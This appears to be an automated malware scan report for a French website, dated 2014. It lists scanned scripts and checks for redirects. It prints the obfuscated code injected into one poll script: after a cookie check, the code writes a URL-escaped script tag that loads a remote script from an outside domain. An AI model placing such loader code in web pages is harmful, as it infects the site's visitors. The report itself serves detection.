Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=boursereflex.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://boursereflex.com/ | 200 OK Content-Length: 67925 Content-Type: text/html | clean |
http://boursereflex.com/templates/default/js/pngfix.js | 200 OK Content-Length: 1573 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/loaderSite.js | 200 OK Content-Length: 1174 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/adsense.js | 200 OK Content-Length: 7061 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/ad_dfp.js | 200 OK Content-Length: 1083 Content-Type: application/javascript | clean |
http://boursereflex.com/plugins/flowplayer/flowplayer-3.2.4.min.js | 200 OK Content-Length: 15723 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/libs/modernizr-1.6.min.js | 200 OK Content-Length: 9563 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.js | 200 OK Content-Length: 163855 Content-Type: text/javascript | clean |
http://boursereflex.com/templates/default/js/jquery.easing.js | 200 OK Content-Length: 8301 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/slider.js | 200 OK Content-Length: 10966 Content-Type: application/javascript | clean |
http://boursereflex.com/modules/home/js/interface_home.js | 200 OK Content-Length: 7395 Content-Type: application/javascript | clean |
http://boursereflex.com/modules/sondage/js/interface_sondage.js | 200 OK Content-Length: 3973 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
$(document).ready(function() {
jQuery('input#submit_sondage').click( function() {
    var coche = false ;
    var id_choix = 0 ;
    var id_sond = $('input#sondage_id').val() ;
    var list = $('div.sondage_reponse input.radio') ;
    $(list).each(function(){
        if(true === $(this).attr('checked')) { coche = true; id_choix = $(this).val() ; }
    }) ;
    if(coche == false){ $('d
if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));}
Antivirus reports:
http://boursereflex.com/templates/default/js/jquery.droppy.js | 200 OK Content-Length: 1669 Content-Type: application/javascript | clean |
http://boursereflex.com/plugins/ClickMap/clickmap.js | 200 OK Content-Length: 1617 Content-Type: application/javascript | clean |
http://boursereflex.com/templates/default/js/interface_main_v3.js | 200 OK Content-Length: 38598 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: boursereflex.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 22:24:47 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u7
Second query (visit from search engine):
GET / HTTP/1.1
Host: boursereflex.com
Referer: http://www.google.com/search?q=boursereflex.com
Result:
The result is similar to the first query. There are no suspicious redirects found.